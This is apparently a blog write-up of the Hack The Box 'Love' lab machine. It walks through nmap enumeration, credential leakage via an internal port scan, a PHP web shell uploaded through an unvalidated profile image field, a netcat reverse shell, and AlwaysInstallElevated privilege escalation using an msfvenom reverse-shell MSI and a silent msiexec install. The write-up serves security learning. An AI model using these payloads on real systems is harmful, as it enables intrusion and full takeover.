Hack the box Love
This was a wonderful practice lab with many paths to gain user and a cool trick for root. We started off with an overwhelming amount of ports/services and decided to focus on the web application. We found an alternative lookup name from the SSL cert, and utilized /etc/hosts to bypass DNS and gain access to a second domain with a file scanning tool, that allowed us to scan credentials off the port 5000 service. With these we logged in through the other domain admin page, and were able to exploit a file upload that did not validate input allowing for remote code execution. However I deployed a webshell instead of direct code execution. This opened the door to pushing up netcat and executing for a reverse shell. From here dropped winPEAS as usual and the output tool hours and hours to go through until eventually the "always install elevated" was noted and allowed for a backdoor packaged as a .msi.
host name mapping for DNS bypass - /etc/hosts
Netcat reverse shell
Priv esc over "Always install elevated"
nc.exe (not nc64.exe as this errored out)
As always we start off with a basic nmap scan and because this machine blocks ping probes we call the -Pn for a no ping scan. There are a rather large of amounts of open ports and services that will require enumeration so I wanted to dive a little deeper before I start forming a plan to tackle these.
Using the nmap default scipts and the version enumeration I am able to extract some more information from each of the services.
└─$ nmap 10.129.48.103 -sV -sC 130 ⨯ Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-29 18:17 EDT Nmap scan report for staging.love.htb (10.129.48.103) Host is up (0.11s latency). Not shown: 993 closed ports PORT STATE SERVICE VERSION 80/tcp open tcpwrapped |_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 |_http-title: Secure file scanner 135/tcp open tcpwrapped 139/tcp open tcpwrapped 443/tcp open tcpwrapped |_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 |_http-title: 403 Forbidden | ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in | Not valid before: 2021-01-18T14:00:16 |_Not valid after: 2022-01-18T14:00:16 |_ssl-date: TLS randomness does not represent time | tls-alpn: |_ http/1.1 445/tcp open tcpwrapped Windows 10 Pro 19042 tcpwrapped 3306/tcp open tcpwrapped 5000/tcp open tcpwrapped Host script results: |_clock-skew: mean: 2h41m02s, deviation: 4h02m32s, median: 21m00s | smb-os-discovery: | OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3) | OS CPE: cpe:/o:microsoft:windows_10::- | Computer name: Love | NetBIOS computer name: LOVE\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2021-08-29T15:39:15-07:00 | smb-security-mode: | account_used: <blank> | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2021-08-29T22:39:12 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 62.81 seconds
We learned several things from this scan
Our apache server has a file scanning service on port 80
We have a windows machine with the apache webplatform as per the HTTP header
Alternative lookup name staging.love.htb as per the ssl cert
Checking for open permissions on the file share provided a denied message.
Enumeration HTTP 10.129.48.103
We initially find a voting system login page and some basic credential attempts does not provide any access. From here I have launched the OWASP dir buster to look for hidden directories.
We have a seemingly endless list of populating directories but there are several which require our initial attention. This includes the Admin related pages and the admin home and login php scripts. Of course we have to mindful of the /images/ folder as this could be indicative of a fileupload form somewhere which we can possible abuse.
Recalling the suggested FQDN name on the SSL cert, we will update our host mappings to bypass the DNS server for name address resolving. We will do this with the /etc/hosts file as seen in the image below.
Browsing to staging.love.htb renders the scanner page that was mentioned in our initial scan over port 80,
Looking around the page quickly shows the file scanner that had been prefaced in the initial scan and can be accessed from the demo button at the top of our landing page.
With all these services and ports open it is common to only allow a connection from the host itself. So with the ability to query from an internal source we can check all the ports from a different perspective. Eventually port 5000 just flat our returns credentials :)
Taking those credentials we jump over to the voting system landing page that we found earlier and were unsuccessful in gaining access with default credentials.
Oddly enough these credentials did not work and I was quite confused as it seemed like the intended path.
After retracing my steps I remembered we had a particular directory for admins and browsing to that presented the same class of login form under the admin directory. Here the credentials worked and we moved on to the next phase of our engagement.
This was our landing page and I immediately started looking around for vulnerabilities.
There are several spots we can upload files so without delay we get started. Eventually I land on the profile update page where we can upload an image to our profile. From here I uploaded a php web shell.
└─$ cat cmd.php <?php echo shell_exec($_GET); ?>
From here we upload this simple shell and are able to now pass commands. You can URL encode the commands if you want, but no worries as they will be automatically encoded for you.
Great we have successful command execution so the next step in the process is to gain access and utilize a remote binary like nc for windows. So we upload it just like the cmd web shell.
We check the current directory and see our desired binaries.
Lets setup a listener and execute a backdoor over port 4444.
There we have it!
I uploaded and execute winpeas. There was a ton of stuff I had to go through until I eventually came across the "Always installElevated". Which sadly enough, I only noticed after my second review on winpeas. Mainly because winpeas tends to be information overload and it can be easy to fixate on just a few things.
So from here I did some research and learned it is literally as simple as it sounds. We create an executable and it will run as root. Thank fully MSFvenon can create .msi and .exe packages for us.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<YOUR IP> LPORT=9001 -f msi -o shell.msi
From here I uploaded my shell.msi, and ran it with
msiexec /quiet /qn /i shell.msi
/quite - Install without prompting the user
/qn /i - Another variation of silent install
With a listener we get a root shell :)